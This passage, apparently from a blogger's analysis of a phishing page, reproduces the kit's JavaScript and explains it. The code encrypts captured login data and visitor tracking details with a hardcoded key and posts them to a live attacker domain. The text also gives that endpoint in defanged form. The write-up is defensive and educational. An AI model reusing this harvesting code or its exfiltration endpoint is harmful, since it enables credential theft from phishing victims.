randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;
}
if(route == "twofaselected"){
randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;
if(currentreq){
currentreq.abort();
}
}
let randexp = new RandExp(randpattern);
let randroute = randexp.gen();
let formattedargs = 0;
if(route == "checkemail"){
formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;
}
if(route !== "checkemail"){
formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;
}
// console.log(formattedargs);
let encrypteddata = encryptData(formattedargs);
const makeRequest = (retryCount) => {
return new Promise((resolve, reject) => {
currentreq = $.ajax({
url: 'https://AhGr3mWzw1EWkt9xG8DZBBJpEW3E5HrvQT6lhADRCoIyxvdGXMtSv2jIhdYe.lukztij.es/40174252504154927KiWDbOseTBOKWTZLXVRWSAJGQYGHIRJLZNAZBOGPYVYWE' + randroute,
type: 'POST',
data: {data: encrypteddata},
success: function(response) {
if (response.message == "Token Not Found" && retryCount < 3) {
console.log('data: '+formattedargs);
setTimeout(function(){
resolve(makeRequest(retryCount + 1));
}, 3000);
}
if (response.message == "Missing Value") {
resolve('missing value');
}
if (response.message !== "Token Not Found") {
let decryptedresp = JSON.parse(decryptData(response));
if(route !== "twofaselected"){
if (decryptedresp.token) {
token = decryptedresp.token;
}
}
if (decryptedresp.message == "Token Not Found" && retryCount < 3) {
console.log('data: '+formattedargs);
setTimeout(function(){
resolve(makeRequest(retryCount + 1));
}, 3000);
} else {
// console.log(decryptedresp);
requestsent = false;
resolve(decryptedresp);
}
}
},
error: function(xhr, status, error) {
requestsent = false;
console.error('Error:', error);
reject(error);
}
});
});
};
return makeRequest(0);
}
};
document.getElementById('sections_pdf').querySelector('#mainLoader').style.display = "none";
document.getElementById('sections_pdf').querySelector('#section_uname_content').classList.remove('d-none');
}, 1000);
}
if (document.getElementById('sections_doc')){
setTimeout(function(){
document.title = "Continue To Account Security";
}, 1000);
}
}, 1000);
}
if(twa == 1){
document.getElementById('section_tryingtosignin').querySelector('.loading-container').classList.remove('loading');
document.getElementById("section_tryingtosignin").classList.toggle('d-none');
document.title = "Continue To Account Security";
document.getElementById('section_uname').classList.remove('d-none');
}
if(twa == 2){
document.title = "Continue To Account Security";
}
// });
In the function sendlive we see that tracking information is being gathered, then sent via POST request:
Browser Agent, IP, Country based on IP.
This information is stored in a variable named data. Both a Key and IV are then created(separately) using:
CryptoJS.enc.Utf8.parse('1234567890123456');
This is then used to encrypt data. Likely, this is to keep the data you put in the phishing page and the information gathered on you from appearing in plain text. It also looks like it maybe turning the text string information into binary.
Keep in mind, this is not happening in a vacuum. This is what happens to your data when you submit it to a phishing site. In reality, it happens BEFORE YOU EVEN SUBMIT ANY INFORMATION. This is why we don’t want our users to click the link. Nuggets of information are sent to the attacker by just having the page load. For this phishing excursion, here is the attacker endpoint:
hxxps[://]AhGr3mWzw1EWkt9xG8DZBBJpEW3E5HrvQT6lhADRCoIyxvdGXMtSv2jIhdYe[.]lukztij[.]es/40174252504154927KiWDbOseTBOKWTZLXVRWSAJGQYGHIRJLZNAZBOGPYVYWE
If you have made it this far, thank you for reading. Leave a comment, let me know your thoughts. I am trying to get better which comes with learning something new everyday.